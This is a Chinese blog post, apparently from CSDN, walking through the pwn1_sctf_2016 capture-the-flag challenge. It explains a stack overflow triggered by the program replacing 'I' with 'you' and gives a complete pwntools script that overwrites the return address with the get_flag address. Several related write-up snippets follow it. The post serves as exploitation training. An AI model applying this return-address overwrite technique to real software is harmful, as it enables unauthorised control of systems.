pwn1_sctf_2016

最新推荐文章于 2025-04-08 20:16:28 发布

Mokapeng

最新推荐文章于 2025-04-08 20:16:28 发布

阅读量295

点赞数 1

分类专栏： PWN CTF训练文章标签： PWN linux

本文链接：https://blog.youkuaiyun.com/qq_41696518/article/details/125764850

版权

CTF训练同时被 2 个专栏收录

46 篇文章

订阅专栏

PWN

37 篇文章

订阅专栏

本文详细分析了pwn1_sctf_2016挑战中的栈溢出漏洞，通过ida静态分析发现get_flag()函数。由于栈不可执行，需要利用溢出执行get_flag。经过调试，确定溢出大小为64字节，通过输入20个'I'和4个'A'的数据配合返回地址，成功触发漏洞。最终提供了一份完整Python利用代码，展示了漏洞利用过程。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

pwn1_sctf_2016

- 题目分析
- 完整代码

题目分析

在这里插入图片描述
仅仅栈不可执行
放入ida，发现漏洞函数，并发现后门get_flag()函数，因此该题就是通过栈溢出执行get_flag,分析溢出字符大小：

fget函数限制输入32位，但s存在60位空间，因此不能直接进行溢出
但后面分析下面程序会将输入的"I"换成"you"
先动态调试查看要溢出的总大小
在这里插入图片描述
溢出大小0x138-0x0fc + 4 = 64
因此输入20个I,在输入4个垃圾数据即可

完整代码

from pwn import *
io = process("./pwn1_sctf_2016")
flag_addr = 0x08048F0D
payload = b'I'*20+b'A'*4+ p32(flag_addr)
io.send(payload)
io.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Mokapeng

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

日行一pwn：pwn1_sctf_2016

m0_57221101的博客

05-13

679

用俩图床，有的有水印，有的没水印，折磨距离上一次日行一pwn已经快一个月了，干脆改成月行一pwn吧（汗。这段时间去恶补了王爽老师的汇编语言。结果一回来就做了这么一道题，函数封装的严严实实，打眼一看全是C++。想入门pwn这么难吗。正片 BUUCTF在线评测使用BUUCTF靶场，首先标准步骤下载--放到kali里面查--拖到windows用ida反汇编发现只有一个NX保护 NX保护就是CPU不会执行放在内存段中的代码，也就是我们之前在BOF中学习的像内存中写入Shell的方法

BUUCTF pwn pwn2_sctf_2016

菜的只能随便写写博客

02-18

2625

0x01 分析 0x02 运行程序读入一个长度，然后按照长度读入后面输入的data并回显。 0x03 IDA 数据长度被限制为32，无法溢出，接着查看get_n函数。接受a2个长度的字符串并放到vuln函数的缓冲区内部，但是a2传入的值类型是unsigned int，而前面判断长度的类型是int，可以规避长度限制。 0x04 思路输入负数长度，绕过长度检查，执行r...

参与评论您还未登录，请先登录后发表或查看评论

pwn1_sctf_2016 1（栈溢出）

最新发布

Snk0xHeart的博客

04-08

261

开虚拟机，checksec32位，还是没开栈保护扔进IDA（32位），找到main，F5反编译没有啥，点进去vuln看看眼花缭乱，先按Shift+F12打开string窗口，一键找出所有的字符串，看看有啥诶，有个cat flag，点进去，然后Ctrl+x，确定按Tab转成c语言看下喔，后门函数这不找到了嘛，然后回去看看vuln函数我们看到第12行的fgets函数，这是我们的输入点，限制在32个字符不熟悉这个函数，求助一下AI：1、可导致栈溢出。

BUUCTF pwn1_sctf_2016

CHAWUCIREN1的博客

04-08

3503

执行一下似乎出现第一个i被替换成you 检查一下保护机制丢到ida里面输入的变量s大小为0x3c，但是我们看fgets里面，我们只能输入32个字符，没法进行溢出，我们在输入的时候，会发现i会被替换成you，所以我们可以利用20个i来填充，找到shell，地址为0x8048F0D 返回地址再随便填四个字符我们可以构造一下payload payload = ‘I’*20 + p64(0x8048F0D) 这里特别注意一下 payload可以有多种写法 ‘I’ *19 + ‘A’*7 + p

PWN——pwn1_sctf_20161——

2301_80905479的博客

12-06

306

有00003c个长度的加8，就是有60个，但是这个s只能输入32个字符，坏了，看看他将I换成了you，就可以成三倍，那就搞成。函数用来从标准输入中读取最大 31 字符（留一个位置给。b'I'*(20)+b'aaaa'就行。发先有一个cat flag.txt。接下来，代码执行了一些与。用shitf + F12看看。那先找一下这个函数的地址。这里就有，记住这个地址。

BUUCTF-pwn2_sctf_2016

weixin_44145820的博客

03-06

1106

这题利用的是负数转无符号数造成缓冲区溢出，以及泄露libc基地址执行ROP 题目分析由于NX开启，我们考虑使用ROP，Canary没有打开使得这题变得很方便下面是vuln函数：在该函数中，程序读入一个字符串并转化为带符号整形（signed int），这时，如果我们输入负数可以避开不能大于32的检查在get_n函数中，读入长度被强制转换为unsigned int，此时-1变成了42949...

关于buuctfpwn新手区的pwn1_sctf_2016

qq_58402603的博客

10-08

293

1。首先checksec 发现开启了 NX保护，栈不可修改然后file这个文件，发现是32位文件。放入iba中分析按F5看伪代码发现main函数的作用只是调用vuln函数，点击进入vuln函数在vuln函数中能看到S中只能输入32个字符，双击s可以发现为s分配了3C的内存空间。但我们分析vuln函数中的代码，可以发现，当我们输入“I”时，将会被替换为“you” 所以我们输入20个“I”就能达到栈溢出的目的，同时可以找到后门函数get_flag 在...

BUUCTF Pwn pwn1_sctf_2016

MrTreebook的博客

12-05

1406

BUUCTF Pwn pwn1_sctf_20161.题目下载地址2.checksec检查保护3.IDA分析4.看一下栈大小5.找到后门函数地址6.exp 1.题目下载地址点击下载题目 2.checksec检查保护运行一下看看 3.IDA分析看一下伪代码 int vuln() { const char *v0; // eax char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF

BUUCTF pwn1_sctf_2016 1

qq_56313338的博客

10-14

228

查看文件信息然后进行反汇编关键信息说实话，这个应该是C++编写的程序，C++基础还是不行，我硬是没看懂这个代码我查了一下字符串这里的get_flag是函数，另一个应该就是执行的一个命令了到IDA中查找TAB切换到汇编，再空格先给他地址记下08048F0D这里网上说是把I换成you导致了溢出，输入I就多出了2个字符，s的空间为32字节，足够我们溢出8字节了。

pwn1_sctf_20161

m0_74091653的博客

09-25

331

函数相对安全，因为它可以限制读取的字符数，防止缓冲区溢出。但是可以发现会将输入的 I 换成 you。发现fgetsg函数溢出0x3c。指向的字符数组中，直到遇到换行符。也就是我们可以用20个 I 来溢出。也找出了cat flag.txt。中读取字符，并将其存储在。这里我们正常溢出是不行的。

buuctf pwn1_sctf_20161

m0_74125780的博客

08-26

219

然后又发现有个fgets函数，但是它限制只有32个字节，双击s查看s的长度，0x3c，有60个字符长度，但是只能输入32个字符所以无法造成栈溢出。但观察函数的内容，并nc一下，发现I可以替换成you。所以输入20个I就刚好满足60长度，再加上4。首先用checksec检查，发现是32位的，所以用32位的ida打开。速度找到system函数，查看它的地址，记下来，0x8048F0D。最后编写脚本，运行得到flag。

[BUUCTF-pwn]——pwn1_sctf_2016

Y_peak的博客

01-30

1031

[BUUCTF-pwn]——pwn1_sctf_2016 题目地址：https://buuoj.cn/challenges#pwn1_sctf_2016 题目：话不多说，先下载下来再说。在Linux上 checksec一下，发现开启了NX保护，但是没有开启Stack的保护，也就是说我们可以很轻易的利用栈溢出。在window的IDA上反汇编看下源码，额，main函数没有什么有用的信息。我们可以看下vuln函数。发现好大一堆，发现了fgets函数，但是很遗憾。它要求我们只能输入不超过32个字符。

buuctf之pwn1_sctf_2016

weixin_54452942的博客

03-27

822

简单易懂~

buu的pwn1_sctf_2016

xieyichensss的博客

03-18

826

**（学生党太菜了）** pwn_sctf_2016 1.拿到文件，首先checksec并file一下。发现NX打开了，哦糟糕.不过不慌，我们下一步打开IDA看一哈 2.用32位的IDA打开他，反汇编一下。双击vuln（）函数。得到这一大堆我看不懂的东西，不过我看到最后有strcpy函数，知道是一个栈溢出的问题。s的大小为0h3c，且函数中出现I和you，着重分析他俩（经过一系列的百度）。得到最后是用you代替I，这样输入20个I就可以溢出到ebp了。 3.我又在全部函数中找啊找，发现...